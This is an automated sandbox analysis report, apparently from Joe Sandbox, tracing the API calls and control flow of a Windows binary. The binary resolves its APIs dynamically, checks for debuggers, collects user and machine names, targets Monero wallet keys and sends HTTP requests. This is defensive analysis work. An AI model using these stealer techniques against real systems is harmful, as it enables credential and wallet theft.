                        • GetProcAddress.KERNEL32(76210000,01961778), ref: 00E39A27
                        • GetProcAddress.KERNEL32(76210000,019616E8), ref: 00E39A3F
                        • GetProcAddress.KERNEL32(76210000,019566F8), ref: 00E39A57
                        • GetProcAddress.KERNEL32(76210000,01961718), ref: 00E39A70
                        • GetProcAddress.KERNEL32(76210000,01956538), ref: 00E39A88
                        • LoadLibraryA.KERNEL32(01961790,?,00E36A00), ref: 00E39A9A
                        • LoadLibraryA.KERNEL32(01961640,?,00E36A00), ref: 00E39AAB
                        • LoadLibraryA.KERNEL32(019614C0,?,00E36A00), ref: 00E39ABD
                        • LoadLibraryA.KERNEL32(01961508,?,00E36A00), ref: 00E39ACF
                        • LoadLibraryA.KERNEL32(01961550,?,00E36A00), ref: 00E39AE0
                        • GetProcAddress.KERNEL32(75B30000,01961658), ref: 00E39B02
                        • GetProcAddress.KERNEL32(751E0000,01961670), ref: 00E39B23
                        • GetProcAddress.KERNEL32(751E0000,01961688), ref: 00E39B3B
                        • GetProcAddress.KERNEL32(76910000,01968CD0), ref: 00E39B5D
                        • GetProcAddress.KERNEL32(75670000,019565F8), ref: 00E39B7E
                        • GetProcAddress.KERNEL32(77310000,019688E0), ref: 00E39B9F
                        • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00E39BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00E39BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: 08aba0c24e2943640e3bde59689abb4111927eeffda9dafe02020c65a2186d42
                        • Instruction ID: 1d62f0f5e5f30f5b57d40a28fe413a54611e14f1bb7f97debcba1166b68a1261
                        • Opcode Fuzzy Hash: 08aba0c24e2943640e3bde59689abb4111927eeffda9dafe02020c65a2186d42
                        • Instruction Fuzzy Hash: 58A11DB5700240DFD364FFA8EA88A563BF9F78C301714455AE686A326CD77FA841DB60

                        Control-flow Graph (rendered graph not reproduced; function at e245c0, calling RtlAllocateHeap and VirtualProtect)
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E2460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E2479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E246D8, 00E245DD, 00E245C7, 00E24662, 00E246C2, 00E24713, 00E246B7, 00E2477B, 00E24678, 00E24729, 00E2475A, 00E2474F, 00E246AC, 00E245E8, 00E2471E, 00E245F3, 00E2473F, 00E24617, 00E24622, 00E24770, 00E2466D, 00E24638, 00E24734, 00E246CD, 00E245D2, 00E24683, 00E2462D, 00E24765, 00E24643, 00E24657
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, one per xref listed under Strings)
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: e527d7621de2fa9fb42486803d768f5d5805d2f898ab5f6d2faf34903ff7fc21
                        • Instruction ID: 0c6d47b1e92c60113c70e6273024afc9f6db32e9d852c024a76994b48c67f78a
                        • Opcode Fuzzy Hash: e527d7621de2fa9fb42486803d768f5d5805d2f898ab5f6d2faf34903ff7fc21
                        • Instruction Fuzzy Hash: BB41D3737C2704FBCE24BBACA84EE9DB7A65F46B04F50B956AC14A7281DAF05E004537

                        Control-flow Graph (rendered graph not reproduced; function at e24880, calling InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle)
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E24915
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E2493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E24ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E40DDB,00000000,?,?,00000000,?,",00000000,?,0196FAD8), ref: 00E24DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E24E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E24E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E24E49
                        • InternetCloseHandle.WININET(00000000), ref: 00E24EAD
                        • InternetCloseHandle.WININET(00000000), ref: 00E24EC5
                        • HttpOpenRequestA.WININET(00000000,0196F988,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E24B15
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                        • InternetCloseHandle.WININET(00000000), ref: 00E24ECF
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 8e6ac8d9cdf33d2d1b37ab50dfff8e6b257d52daa3481ffcbbfa2418fbdf7948
                        • Instruction ID: 640d4806f3e1303ab51d60dbd7a5b06c5a378720be8746f3a3ef6eb937e123a4
                        • Opcode Fuzzy Hash: 8e6ac8d9cdf33d2d1b37ab50dfff8e6b257d52daa3481ffcbbfa2418fbdf7948
                        • Instruction Fuzzy Hash: 33120E72910218AADB18EB50DC9AFEEBBB8BF54300F5451A9F14672091DF342F89CF61
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E37910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 00E3792F
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 0759f11ae5fa6bde69e8051921d604202aab98f3270a885ca7c57f0b77b55fa1
                        • Instruction ID: 88aa03b10a044997a767d4a8d462ba8dd756df2b7d308d2daf3e1db364040847
                        • Opcode Fuzzy Hash: 0759f11ae5fa6bde69e8051921d604202aab98f3270a885ca7c57f0b77b55fa1
                        • Instruction Fuzzy Hash: 170186B1A08204EFC750DF94D949BAABBB8F744B21F104219FA85F7280C3795900CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E211B7), ref: 00E37880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E37887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E3789F
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 37273a727f517278a2182a1d62e3fcdcd0813d11d4ad1f6fdf6dc671561dd89e
                        • Instruction ID: cc5f50e0519e9cadcc374c5c41708c5de9e7fb309ed7526904b01298ba219906
                        • Opcode Fuzzy Hash: 37273a727f517278a2182a1d62e3fcdcd0813d11d4ad1f6fdf6dc671561dd89e
                        • Instruction Fuzzy Hash: 07F04FB1E44209EFC714DF98DD49BAEFBB8FB08721F10025AFA45A3680C7791504CBA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 1a4cbad52d01c62a388c8e59faa3b01a4ae48e307004feaf3a8bec9030fe8923
                        • Instruction ID: d0bb43b28103d47b78c49478010261bc147af6902123d9dad327a60144ff46e2
                        • Opcode Fuzzy Hash: 1a4cbad52d01c62a388c8e59faa3b01a4ae48e307004feaf3a8bec9030fe8923
                        • Instruction Fuzzy Hash: E2D05E74A0030CDBCB10EFE0D84A6DDBB78FB08311F001594D90673340EA359591CBA5

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 e39c10-e39c1a 634 e39c20-e3a031 GetProcAddress * 43 633->634 635 e3a036-e3a0ca LoadLibraryA * 8 633->635 634->635 636 e3a146-e3a14d 635->636 637 e3a0cc-e3a141 GetProcAddress * 5 635->637 638 e3a153-e3a211 GetProcAddress * 8 636->638 639 e3a216-e3a21d 636->639 637->636 638->639 640 e3a298-e3a29f 639->640 641 e3a21f-e3a293 GetProcAddress * 5 639->641 642 e3a337-e3a33e 640->642 643 e3a2a5-e3a332 GetProcAddress * 6 640->643 641->640 644 e3a344-e3a41a GetProcAddress * 9 642->644 645 e3a41f-e3a426 642->645 643->642 644->645 646 e3a4a2-e3a4a9 645->646 647 e3a428-e3a49d GetProcAddress * 5 645->647 648 e3a4ab-e3a4d7 GetProcAddress * 2 646->648 649 e3a4dc-e3a4e3 646->649 647->646 648->649 650 e3a515-e3a51c 649->650 651 e3a4e5-e3a510 GetProcAddress * 2 649->651 652 e3a612-e3a619 650->652 653 e3a522-e3a60d GetProcAddress * 10 650->653 651->650 654 e3a61b-e3a678 GetProcAddress * 4 652->654 655 e3a67d-e3a684 652->655 653->652 654->655 656 e3a686-e3a699 GetProcAddress 655->656 657 e3a69e-e3a6a5 655->657 656->657 658 e3a6a7-e3a703 GetProcAddress * 4 657->658 659 e3a708-e3a709 657->659 658->659
                        APIs
                        • GetProcAddress.KERNEL32(76210000,01956418), ref: 00E39C2D
                        • GetProcAddress.KERNEL32(76210000,01956618), ref: 00E39C45
                        • GetProcAddress.KERNEL32(76210000,01969000), ref: 00E39C5E
                        • GetProcAddress.KERNEL32(76210000,01969030), ref: 00E39C76
                        • GetProcAddress.KERNEL32(76210000,01969048), ref: 00E39C8E
                        • GetProcAddress.KERNEL32(76210000,0196D968), ref: 00E39CA7
                        • GetProcAddress.KERNEL32(76210000,0195A4C0), ref: 00E39CBF
                        • GetProcAddress.KERNEL32(76210000,0196D860), ref: 00E39CD7
                        • GetProcAddress.KERNEL32(76210000,0196D980), ref: 00E39CF0
                        • GetProcAddress.KERNEL32(76210000,0196D9F8), ref: 00E39D08
                        • GetProcAddress.KERNEL32(76210000,0196D8C0), ref: 00E39D20
                        • GetProcAddress.KERNEL32(76210000,01956458), ref: 00E39D39
                        • GetProcAddress.KERNEL32(76210000,019566B8), ref: 00E39D51
                        • GetProcAddress.KERNEL32(76210000,01956698), ref: 00E39D69
                        • GetProcAddress.KERNEL32(76210000,01956738), ref: 00E39D82
                        • GetProcAddress.KERNEL32(76210000,0196D8D8), ref: 00E39D9A
                        • GetProcAddress.KERNEL32(76210000,0196DA10), ref: 00E39DB2
                        • GetProcAddress.KERNEL32(76210000,0195A768), ref: 00E39DCB
                        • GetProcAddress.KERNEL32(76210000,01956778), ref: 00E39DE3
                        • GetProcAddress.KERNEL32(76210000,0196D9E0), ref: 00E39DFB
                        • GetProcAddress.KERNEL32(76210000,0196DA28), ref: 00E39E14
                        • GetProcAddress.KERNEL32(76210000,0196DA40), ref: 00E39E2C
                        • GetProcAddress.KERNEL32(76210000,0196D848), ref: 00E39E44
                        • GetProcAddress.KERNEL32(76210000,01956578), ref: 00E39E5D
                        • GetProcAddress.KERNEL32(76210000,0196D890), ref: 00E39E75
                        • GetProcAddress.KERNEL32(76210000,0196DA58), ref: 00E39E8D
                        • GetProcAddress.KERNEL32(76210000,0196DA70), ref: 00E39EA6
                        • GetProcAddress.KERNEL32(76210000,0196D920), ref: 00E39EBE
                        • GetProcAddress.KERNEL32(76210000,0196D830), ref: 00E39ED6
                        • GetProcAddress.KERNEL32(76210000,0196DA88), ref: 00E39EEF
                        • GetProcAddress.KERNEL32(76210000,0196DAA0), ref: 00E39F07
                        • GetProcAddress.KERNEL32(76210000,0196DAB8), ref: 00E39F1F
                        • GetProcAddress.KERNEL32(76210000,0196D878), ref: 00E39F38
                        • GetProcAddress.KERNEL32(76210000,0195FE30), ref: 00E39F50
                        • GetProcAddress.KERNEL32(76210000,0196D938), ref: 00E39F68
                        • GetProcAddress.KERNEL32(76210000,0196DAD0), ref: 00E39F81
                        • GetProcAddress.KERNEL32(76210000,019564F8), ref: 00E39F99
                        • GetProcAddress.KERNEL32(76210000,0196DB00), ref: 00E39FB1
                        • GetProcAddress.KERNEL32(76210000,019564B8), ref: 00E39FCA
                        • GetProcAddress.KERNEL32(76210000,0196DAE8), ref: 00E39FE2
                        • GetProcAddress.KERNEL32(76210000,0196DB18), ref: 00E39FFA
                        • GetProcAddress.KERNEL32(76210000,019564D8), ref: 00E3A013
                        • GetProcAddress.KERNEL32(76210000,01956518), ref: 00E3A02B
                        • LoadLibraryA.KERNEL32(0196D8A8,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A03D
                        • LoadLibraryA.KERNEL32(0196D8F0,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A04E
                        • LoadLibraryA.KERNEL32(0196D908,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A060
                        • LoadLibraryA.KERNEL32(0196D950,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A072
                        • LoadLibraryA.KERNEL32(0196D998,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A083
                        • LoadLibraryA.KERNEL32(0196D9B0,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A095
                        • LoadLibraryA.KERNEL32(0196D9C8,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A0A7
                        • LoadLibraryA.KERNEL32(0196DC20,?,00E35CA3,00E40AEB,?,?,?,?,?,?,?,?,?,?,00E40AEA,00E40AE3), ref: 00E3A0B8
                        • GetProcAddress.KERNEL32(751E0000,01956398), ref: 00E3A0DA
                        • GetProcAddress.KERNEL32(751E0000,0196DD28), ref: 00E3A0F2
                        • GetProcAddress.KERNEL32(751E0000,01968A70), ref: 00E3A10A
                        • GetProcAddress.KERNEL32(751E0000,0196DC38), ref: 00E3A123
                        • GetProcAddress.KERNEL32(751E0000,01956178), ref: 00E3A13B
                        • GetProcAddress.KERNEL32(70150000,0195A880), ref: 00E3A160
                        • GetProcAddress.KERNEL32(70150000,01956298), ref: 00E3A179
                        • GetProcAddress.KERNEL32(70150000,0195A7E0), ref: 00E3A191
                        • GetProcAddress.KERNEL32(70150000,0196DD40), ref: 00E3A1A9
                        • GetProcAddress.KERNEL32(70150000,0196DC50), ref: 00E3A1C2
                        • GetProcAddress.KERNEL32(70150000,01956318), ref: 00E3A1DA
                        • GetProcAddress.KERNEL32(70150000,01956138), ref: 00E3A1F2
                        • GetProcAddress.KERNEL32(70150000,0196DC68), ref: 00E3A20B
                        • GetProcAddress.KERNEL32(753A0000,01956038), ref: 00E3A22C
                        • GetProcAddress.KERNEL32(753A0000,01956278), ref: 00E3A244
                        • GetProcAddress.KERNEL32(753A0000,0196DD88), ref: 00E3A25D
                        • GetProcAddress.KERNEL32(753A0000,0196DC80), ref: 00E3A275
                        • GetProcAddress.KERNEL32(753A0000,01956098), ref: 00E3A28D
                        • GetProcAddress.KERNEL32(76310000,0195A650), ref: 00E3A2B3
                        • GetProcAddress.KERNEL32(76310000,0195A498), ref: 00E3A2CB
                        • GetProcAddress.KERNEL32(76310000,0196DCB0), ref: 00E3A2E3
                        • GetProcAddress.KERNEL32(76310000,019560D8), ref: 00E3A2FC
                        • GetProcAddress.KERNEL32(76310000,019560B8), ref: 00E3A314
                        • GetProcAddress.KERNEL32(76310000,0195A808), ref: 00E3A32C
                        • GetProcAddress.KERNEL32(76910000,0196DC98), ref: 00E3A352
                        • GetProcAddress.KERNEL32(76910000,01956078), ref: 00E3A36A
                        • GetProcAddress.KERNEL32(76910000,01968920), ref: 00E3A382
                        • GetProcAddress.KERNEL32(76910000,0196DCC8), ref: 00E3A39B
                        • GetProcAddress.KERNEL32(76910000,0196DCE0), ref: 00E3A3B3
                        • GetProcAddress.KERNEL32(76910000,019560F8), ref: 00E3A3CB
                        • GetProcAddress.KERNEL32(76910000,01956118), ref: 00E3A3E4
                        • GetProcAddress.KERNEL32(76910000,0196DCF8), ref: 00E3A3FC
                        • GetProcAddress.KERNEL32(76910000,0196DC08), ref: 00E3A414
                        • GetProcAddress.KERNEL32(75B30000,019563B8), ref: 00E3A436
                        • GetProcAddress.KERNEL32(75B30000,0196DD10), ref: 00E3A44E
                        • GetProcAddress.KERNEL32(75B30000,0196DE00), ref: 00E3A466
                        • GetProcAddress.KERNEL32(75B30000,0196DB48), ref: 00E3A47F
                        • GetProcAddress.KERNEL32(75B30000,0196DD58), ref: 00E3A497
                        • GetProcAddress.KERNEL32(75670000,01956058), ref: 00E3A4B8
                        • GetProcAddress.KERNEL32(75670000,01956158), ref: 00E3A4D1
                        • GetProcAddress.KERNEL32(76AC0000,01956198), ref: 00E3A4F2
                        • GetProcAddress.KERNEL32(76AC0000,0196DD70), ref: 00E3A50A
                        • GetProcAddress.KERNEL32(6F4E0000,019561D8), ref: 00E3A530
                        • GetProcAddress.KERNEL32(6F4E0000,01956338), ref: 00E3A548
                        • GetProcAddress.KERNEL32(6F4E0000,019561B8), ref: 00E3A560
                        • GetProcAddress.KERNEL32(6F4E0000,0196DDA0), ref: 00E3A579
                        • GetProcAddress.KERNEL32(6F4E0000,019561F8), ref: 00E3A591
                        • GetProcAddress.KERNEL32(6F4E0000,01956218), ref: 00E3A5A9
                        • GetProcAddress.KERNEL32(6F4E0000,019563D8), ref: 00E3A5C2
                        • GetProcAddress.KERNEL32(6F4E0000,01956238), ref: 00E3A5DA
                        • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00E3A5F1
                        • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00E3A607
                        • GetProcAddress.KERNEL32(75AE0000,0196DDD0), ref: 00E3A629
                        • GetProcAddress.KERNEL32(75AE0000,01968A30), ref: 00E3A641
                        • GetProcAddress.KERNEL32(75AE0000,0196DDB8), ref: 00E3A659
                        • GetProcAddress.KERNEL32(75AE0000,0196DDE8), ref: 00E3A672
                        • GetProcAddress.KERNEL32(76300000,01956258), ref: 00E3A693
                        • GetProcAddress.KERNEL32(6FE40000,0196DE18), ref: 00E3A6B4
                        • GetProcAddress.KERNEL32(6FE40000,01956358), ref: 00E3A6CD
                        • GetProcAddress.KERNEL32(6FE40000,0196DBD8), ref: 00E3A6E5
                        • GetProcAddress.KERNEL32(6FE40000,0196DBC0), ref: 00E3A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 17793d3e58240baef2d3e22780a7f3f9a337cc2fe608ee6b82c5e050ea89afb3
                        • Instruction ID: e5b0bc6e88fba4fa56d108a55f7ae03b1be7b4dbe7c7557116c5047b2e095dec
                        • Opcode Fuzzy Hash: 17793d3e58240baef2d3e22780a7f3f9a337cc2fe608ee6b82c5e050ea89afb3
                        • Instruction Fuzzy Hash: A3620CB5700200EFC764FFA8EA8895637F9F78C601714855AE686E326CD73FA841DB60

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1033 e26280-e2630b call e3a7a0 call e247b0 call e3a740 InternetOpenA StrCmpCA 1040 e26314-e26318 1033->1040 1041 e2630d 1033->1041 1042 e26509-e26525 call e3a7a0 call e3a800 * 2 1040->1042 1043 e2631e-e26342 InternetConnectA 1040->1043 1041->1040 1063 e26528-e2652d 1042->1063 1044 e26348-e2634c 1043->1044 1045 e264ff-e26503 InternetCloseHandle 1043->1045 1047 e2635a 1044->1047 1048 e2634e-e26358 1044->1048 1045->1042 1050 e26364-e26392 HttpOpenRequestA 1047->1050 1048->1050 1052 e264f5-e264f9 InternetCloseHandle 1050->1052 1053 e26398-e2639c 1050->1053 1052->1045 1055 e263c5-e26405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 e2639e-e263bf InternetSetOptionA 1053->1056 1058 e26407-e26427 call e3a740 call e3a800 * 2 1055->1058 1059 e2642c-e2644b call e38940 1055->1059 1056->1055 1058->1063 1066 e264c9-e264e9 call e3a740 call e3a800 * 2 1059->1066 1067 e2644d-e26454 1059->1067 1066->1063 1069 e26456-e26480 InternetReadFile 1067->1069 1070 e264c7-e264ef InternetCloseHandle 1067->1070 1074 e26482-e26489 1069->1074 1075 e2648b 1069->1075 1070->1052 1074->1075 1079 e2648d-e264c5 call e3a9b0 call e3a8a0 call e3a800 1074->1079 1075->1070 1079->1069
                        APIs
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E24839
                          • Part of subcall function 00E247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E24849
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • InternetOpenA.WININET(00E40DFE,00000001,00000000,00000000,00000000), ref: 00E262E1
                        • StrCmpCA.SHLWAPI(?,0196FA58), ref: 00E26303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E26335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0196F4B0,00000000,00000000,00400100,00000000), ref: 00E26385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E263BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E263D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E263FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E2646D
                        • InternetCloseHandle.WININET(00000000), ref: 00E264EF
                        • InternetCloseHandle.WININET(00000000), ref: 00E264F9
                        • InternetCloseHandle.WININET(00000000), ref: 00E26503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: ecbd0319188409875a31773d53227288dfc9687a1d8bca8de060c5b486c844fd
                        • Instruction ID: 6518d6c2a08f8970d6797b38df34f07a46b3defb6f081671a90cab66b3f0c248
                        • Opcode Fuzzy Hash: ecbd0319188409875a31773d53227288dfc9687a1d8bca8de060c5b486c844fd
                        • Instruction Fuzzy Hash: 82715E71A00218EBDB24EFA0DC49FEE77B8BB44700F1091A9F14A7B194DBB56A85CF51

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1090 e35510-e35577 call e35ad0 call e3a820 * 3 call e3a740 * 4 1106 e3557c-e35583 1090->1106 1107 e355d7-e3564c call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1106->1107 1108 e35585-e355b6 call e3a820 call e3a7a0 call e21590 call e351f0 1106->1108 1133 e35693-e356a9 call e3aad0 StrCmpCA 1107->1133 1137 e3564e-e3568e call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1107->1137 1124 e355bb-e355d2 call e3a8a0 call e3a800 1108->1124 1124->1133 1140 e356af-e356b6 1133->1140 1141 e357dc-e35844 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1133->1141 1137->1133 1144 e357da-e3585f call e3aad0 StrCmpCA 1140->1144 1145 e356bc-e356c3 1140->1145 1270 e35ac3-e35ac6 1141->1270 1164 e35991-e359f9 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1144->1164 1165 e35865-e3586c 1144->1165 1149 e356c5-e35719 call e3a820 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1145->1149 1150 e3571e-e35793 call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 e35795-e357d5 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1150->1250 1164->1270 1172 e35872-e35879 1165->1172 1173 e3598f-e35a14 call e3aad0 StrCmpCA 1165->1173 1174 e358d3-e35948 call e3a740 * 2 call e21590 call e352c0 call e3a8a0 call e3a800 call e3aad0 StrCmpCA 1172->1174 1175 e3587b-e358ce call e3a820 call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1172->1175 1203 e35a16-e35a21 Sleep 1173->1203 1204 e35a28-e35a91 call e3a8a0 call e3a820 * 2 call e21670 call e3a800 * 4 call e36560 call e21550 1173->1204 1174->1173 1275 e3594a-e3598a call e3a7a0 call e21590 call e351f0 call e3a8a0 call e3a800 1174->1275 1175->1173 1203->1106 1204->1270 1250->1144 1275->1173
                        APIs
                          • Part of subcall function 00E3A820: lstrlen.KERNEL32(00E24F05,?,?,00E24F05,00E40DDE), ref: 00E3A82B
                          • Part of subcall function 00E3A820: lstrcpy.KERNEL32(00E40DDE,00000000), ref: 00E3A885
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E356A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35857
                          • Part of subcall function 00E3A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E3A7E6
                          • Part of subcall function 00E351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35228
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                          • Part of subcall function 00E352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35318
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E3532F
                          • Part of subcall function 00E352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00E35364
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E35383
                          • Part of subcall function 00E352C0: lstrlen.KERNEL32(00000000), ref: 00E353AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E3578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E35940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E35A0C
